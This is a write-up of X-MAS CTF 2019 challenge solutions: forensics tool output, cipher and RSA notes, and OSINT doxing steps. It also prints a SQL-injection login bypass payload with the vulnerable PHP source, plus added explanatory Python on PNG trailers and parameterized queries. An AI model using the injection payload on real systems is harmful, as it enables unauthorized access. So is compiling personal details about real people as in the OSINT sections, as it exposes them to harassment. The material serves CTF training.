# X-MAS CTF 2019
# !Sanity Checks
## 1 - Merry Christmas!
:::success
:+1: oklien
:::
> Here is your first X-MAS CTF flag:
It was shown on the page:
Flag: `X-MAS{HoHoHo__W3lc0me_T0_X-MAS_CTF_2019!}`
## 5 - Santa's Secret Club
:::success
:+1: oklien
:::
> Join our Discord server in order to stay up-to-date with the competition!
There you can form teams, chat with the organizers and follow challenge releases with ease:
Invite link: https://discord.gg/9dwXTKF
Topic:
```
Merry Christmas! X-MAS CTF Starts on 13th of december
X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}
```
Flag: `X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}`
# osint
## 25 - Bobi's wHack
:::success
:+1: oklien
:::
> Well.... as far as we know he's uploading some walkthroughs from his OSCP Journey; show him some support ;) *subscribe pls ;3*
Google search, found the YouTube channel -> about page
* https://www.youtube.com/channel/UCskRBTQUbl8jqCmxFoEtqOA/about
Flag: `X-MAS{subscribelikesharethanks-bobi:)}`
## 50 - Dox the Yak
:::success
:+1: oklien
:::
> Santa had some trouble getting info about a weird internet dude nicknamed yakuhito. Help him answer the following questions and you will be rewarded ;)
* Question #1: What's yakuhito's dream car?
* Question #2: What's yakuhito's real name?
* Question #3: What phone model is yakuhito currently using?
> Example flag: X-MAS{ch3vrolet_corvett3_john_doe_galaxyj7pro}
> Note: The car's model must be written in leetspeak
> Author: yakuhito
* https://www.reddit.com/r/KeybaseProofs/comments/c969d6/my_keybase_proof_reddityakuhito_keybaseyakuhito/?ref=readnext
* https://www.reddit.com/user/yakuhito
https://keybase.io/yakuhito
Name: Mihai Dancaescu
https://keybase.io/yakuhito/devices
https://github.com/Yakuhito/phonemodel/commit/6a6b8d18f7affe43cb54eef79625bf05f373695e#comments
Phone: OnePlus
Model 7
Commit message:
Update README.md Pro version
Twitter also shows that he uses Android
Dream car:
https://www.youtube.com/channel/UChvAolOWaKdAVCXmPUpi8qA/discussion
> trupples (3 days ago): what car do you like sir
>
> Empereur Paradis (21 hours ago): Everyone is searching the most wanted car 🤣

doh :p
Follows Tesla and Elon Musk on Twitter
@yakuh1t0
Can't wait to buy a T3SL@ and test those!
Cyb3rtruck :P
Found the Twitter thread...
Other:
https://www.offensive-security.com/offsec/meet-mihai-16-year-old-oscp-holder/
Bucharest, Romania
https://github.com/Yakuhito
kuhi.to
https://ro.linkedin.com/in/mihai-dancaescu-668a2a177?trk=public_profile_samename_profile_profile-result-card_result-card_full-click
InfoSec Enthusiast | CTF Player @ HTsP | CEH, OSCP
ONEPLUS IS APPARENTLY THE MODEL NAME... !"#%¤¤#
Flag: `X-MAS{t3sl@_cyb3rtruck_mihai_dancaescu_oneplus7pro}`
## 175 - Dox the Grinch
:::danger
:-1: oklien
:::
> I found this guy on the internet who says that he hates Christmas! Unbelievable. Can you find out more info about him?
> Flag format is
X-MAS{name_surname_city_favouriteColor_bloodType_height}
For example,
X-MAS{george_lucas_newyork_blue_A+_184}
* https://notabug.io/t/whatever/comments/44530e6b7740f22940db9c176b621900d0bce697/i-hate-xmas
Has a post about Hacker News
https://news.ycombinator.com/user?id=Domay1986
Hello, my name is Eugene and I am interested in finances. I strongly believe that christmas is a scam.
They closed my twitter account! See interesting posts I reply to on notabug.io: https://notabug.io/user/uIUP3NZDQVnKkISlVdjM0cSOwt_5EKu1g3CzQGmtTSc.VlYirh-sCV0rZ_6px0em8HWyeKZN8TMnTtY2l0YtoTA
Business Inquires:
domay1986 (at) hotmail.com
* Username: Domay1986
* First name: Eugene
* Email: domay1986@hotmail.com
* Interests: Finances, Christmas is a scam
Account deleted
https://twitter.com/Domay1986
https://www.instagram.com/domay1986/
qehbesem
^?
coffee in Kurdish...
One follower
https://www.instagram.com/jhnsmth25/
john
Flag: `X-MAS{?_?_?_?_?_?}`
# forensics
## 25 - Santa's Forensics 101
:::success
:+1: oklien
:::
> Santa needs the help of an experienced forensics analyst. But first, he has to make sure that you are worthy.
```shell=
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ exiftool X-MAS_Flag2.png
ExifTool Version Number : 10.80
File Name : X-MAS_Flag2.png
Directory : .
File Size : 602 kB
File Modification Date/Time : 2019:12:13 20:15:39+01:00
File Access Date/Time : 2019:12:13 20:15:41+01:00
File Inode Change Date/Time : 2019:12:16 02:00:31+01:00
File Permissions : rw-r--r--
File Type : ZIP
File Type Extension : zip
MIME Type : application/zip
Zip Required Version : 20
Zip Bit Flag : 0
Zip Compression : None
Zip Modify Date : 2019:12:08 20:39:23
Zip CRC : 0x00000000
Zip Compressed Size : 0
Zip Uncompressed Size : 0
Zip File Name : hidden_data_dt/
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ file X-MAS_Flag2.png
X-MAS_Flag2.png: Zip archive data, at least v2.0 to extract
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ unzip X-MAS_Flag2.png
Archive: X-MAS_Flag2.png
warning [X-MAS_Flag2.png]: 308188 extra bytes at beginning or within zipfile
(attempting to process anyway)
creating: hidden_data_dt/
inflating: hidden_data_dt/logo2.png
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ exiftool hidden_data_dt/logo2.png
ExifTool Version Number : 10.80
File Name : logo2.png
Directory : hidden_data_dt
File Size : 303 kB
File Modification Date/Time : 2019:12:02 15:52:48+01:00
File Access Date/Time : 2019:12:16 02:01:19+01:00
File Inode Change Date/Time : 2019:12:16 02:01:09+01:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 908
Image Height : 393
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 3779
Pixels Per Unit Y : 3779
Pixel Units : meters
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 908x393
Megapixels : 0.357
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ zsteg hidden_data_dt/logo2.png
[?] 32 bytes of extra data after image end (IEND), offset = 0x4ba1b
extradata:0 .. text: "X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}"
imagedata .. text: "ggg(llld"
```
Flag: `X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}`
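The two checks the tools performed above (magic bytes versus file extension, and data after the PNG `IEND` chunk), as an added Python example that is not part of the original write-up. The sample archive, its 1x1 PNG and the trailer text are constructed in memory.

```python
import io, struct, zipfile, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_SIG = b"PK\x03\x04"

def sniff(data):
    """Identify a file by its magic bytes, ignoring the extension."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(ZIP_SIG):
        return "zip"
    return "unknown"

def png_trailer(data):
    """Walk the PNG chunks; return (offset, bytes) of anything after IEND."""
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # length field + type + body + CRC
        if ctype == b"IEND":
            return pos, data[pos:]
    raise ValueError("no IEND chunk found")

def inspect(data):
    """Return {name: trailing bytes} for a bare PNG or for PNGs inside a ZIP."""
    kind = sniff(data)
    if kind == "png":
        return {"<file>": png_trailer(data)[1]}
    if kind != "zip":
        return {}
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            body = zf.read(name)
            if sniff(body) == "png":
                found[name] = png_trailer(body)[1]
    return found

def chunk(ctype, body=b""):
    # Build one PNG chunk: length, type, body, CRC32 over type + body.
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def build_sample():
    """Constructed sample: a 1x1 PNG with a text trailer, stored in a ZIP."""
    png = (PNG_SIG + chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0))
           + chunk(b"IDAT", zlib.compress(b"\x00" * 5)) + chunk(b"IEND"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hidden_data_dt/logo2.png", png + b"constructed trailer text")
    return buf.getvalue()
```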
# Crypto
## 25 - Mata Nui's Cookies
:::success
:+1: oklien, ingeborg
:::
> Well... Mata Nui said something about his beloved cookies, but I've never seen this language before.
* Files: chall.png
> Note: Please add brackets { } manually to the flag string. Flag is also uppercase.
https://i.pinimg.com/736x/bb/05/19/bb0519cd945334846ca236fb2893ae30.jpg
Matoran alphabet
Flag: `X-MAS{MATANUIHASPREPAREDTHECOOKIES}`
## 50 - DeFUNct Ransomware
:::warning
:-1: oklien
:::
> Santa got infected by a ransomware! His elves managed to extract the public key, but couldn't break it. Help Santa decrypt his memos and save Christmas!
Files: download
Author: yakuhito
n: 795569463642685540507503580717531982215679866156448758181874864294322245115046429295501396806569726084791213843313411985306755767933614251017259685360119715465741448841742926933764058184678978561438979554324014291467144646477238464467422645352253054043072408503415623126059018449111807300294890437634529289983603557882115343971407081044050231310858245171002149317227947666679143716043142141154344524386085333349328691743473103727587822968025700198172293605188589348169121979328380110985341428872278372426313622759225108517531628814853640680656657769539723198346005032762702856464738405070059566116940640592020837592563966093405895649052241416909627641069000138027201809936286028443581259045590752809132011594533609186039058798304319124598876514669458750171121861029071117458575853963148168447032328126766812085206373608016609150982512467597800331177524543178311636877811255184421602626713179220562081413985985692847372669113031244726086691179028200044542399429299315486513734144695492816493025225952668485937918985944213972980220480476191347009337324778384697829597183756976186825413917475597248616769321954150777672675555280228376126308362907381766363071890237458517881243184612898247096962136202978853341989193954815333784856612689
e: 13337
```shell=
$ ./RsaCtfTool.py -n \
795569463642685540507503580717531982215679866156448758181874864294322245115046429295501396806569726084791213843313411985306755767933614251017259685360119715465741448841742926933764058184678978561438979554324014291467144646477238464467422645352253054043072408503415623126059018449111807300294890437634529289983603557882115343971407081044050231310858245171002149317227947666679143716043142141154344524386085333349328691743473103727587822968025700198172293605188589348169121979328380110985341428872278372426313622759225108517531628814853640680656657769539723198346005032762702856464738405070059566116940640592020837592563966093405895649052241416909627641069000138027201809936286028443581259045590752809132011594533609186039058798304319124598876514669458750171121861029071117458575853963148168447032328126766812085206373608016609150982512467597800331177524543178311636877811255184421602626713179220562081413985985692847372669113031244726086691179028200044542399429299315486513734144695492816493025225952668485937918985944213972980220480476191347009337324778384697829597183756976186825413917475597248616769321954150777672675555280228376126308362907381766363071890237458517881243184612898247096962136202978853341989193954815333784856612689 -e 13337 --createpub > key.pub
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019/emu20$ cat key.pub
-----BEGIN PUBLIC KEY-----
...
-----END PUBLIC KEY-----
```
# Web
## 25 - Sequel Fun
> So I found this login page, but I forgot the credentials :(
* Remote server: http://challs.xmas.htsp.ro:11006
```shell=
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ GET http://challs.xmas.htsp.ro:11006/ | grep '<!--'
<!-- ?source=1 -->
oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ GET http://challs.xmas.htsp.ro:11006/?source=1
```
```php=
<?php
if (isset ($_GET['source'])) {
    show_source ("index.php");
    die ();
}
?>
<head>
    <link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
    <div class="container">
<?php
include ("config.php");
if (isset ($_GET['user']) && isset ($_GET['pass'])) {
    $user = $_GET['user'];
    $pass = $_GET['pass'];
    if (strpos ($user, '1') === false && strpos ($pass, '1') === false) {
        $conn = new mysqli ($servername, $username, $password, $dbname);
        $result = mysqli_query ($conn, "SELECT * FROM users WHERE user='" . $user . "' AND pass='" . $pass . "'", MYSQLI_STORE_RESULT); // TO-DO: Remove elf:elf account
        if ($result === false) {
            echo "<b>Our servers have run into a query error. Please try again later.</b>";
        } else {
            if ($result->num_rows !== 0) {
                $row = mysqli_fetch_array ($result, MYSQLI_ASSOC);
                echo "<h1>You are logged in as: " . $row["user"] . "</h1><br>";
                echo "<b class='flag'>";
                if ($row ["uid"] === "0")
                    echo $flag;
                else
                    echo "Welcome elf!";
                echo "</b>";
            } else {
                echo "<b>Login fail.</b>";
            }
        }
    } else {
        echo "<b>I don't like the number 1 :(</b>";
    }
} else {
    echo '<form class="center">
        <h1>Santa Login:</h1>
        <label>Username:</label> <input type="text" name="user" autocomplete="off"><br>
        <label>Password:</label> <input type="password" name="pass" autocomplete="off"><br>
        <input type="submit" value="Connect">
    </form>';
}
?>
    </div>
    <br>
    <script src="/js/snow.js"></script>
    <!-- ?source=1 -->
</body>
```
* The digit 1 cannot be used in user or pass
* Need to log in as the user with uid 0
http://challs.xmas.htsp.ro:11006/?user=admin&pass=%27%20or%20%27%27=%27
You are logged in as: admin
Flag: `X-MAS{S0_1_c4n_b3_4dmin_w1th0ut_7h3_p4ssw0rd?}`
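Why the `'1'` blocklist does not stop the bypass while a parameterized query does, as an added example that is not part of the original write-up or the challenge code. It models the `index.php` query in Python against an in-memory SQLite table; the table layout, the elf's uid and the admin password are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the challenge database (real schema is not on the page).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER, user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(0, "admin", "constructed-admin-secret"), (1, "elf", "elf")])
    return db

def passes_filter(user, pw):
    # Same blocklist as index.php: reject input containing the character '1'.
    return "1" not in user and "1" not in pw

def login_concat(db, user, pw):
    # Mirrors index.php: user input is pasted into the SQL text.
    if not passes_filter(user, pw):
        return None
    sql = ("SELECT uid, user FROM users WHERE user='" + user
           + "' AND pass='" + pw + "'")
    return db.execute(sql).fetchone()

def login_param(db, user, pw):
    # Hardened form: placeholders keep input as data, so no blocklist is needed.
    sql = "SELECT uid, user FROM users WHERE user=? AND pass=?"
    return db.execute(sql, (user, pw)).fetchone()

# Decoded from the URL in the write-up: pass=%27%20or%20%27%27=%27
PAYLOAD = "' or ''='"
```

With the concatenated query the `OR ''=''` clause matches every row, so the first row (uid 0 here) is returned; the parameterized version compares the whole string against the stored password and returns nothing.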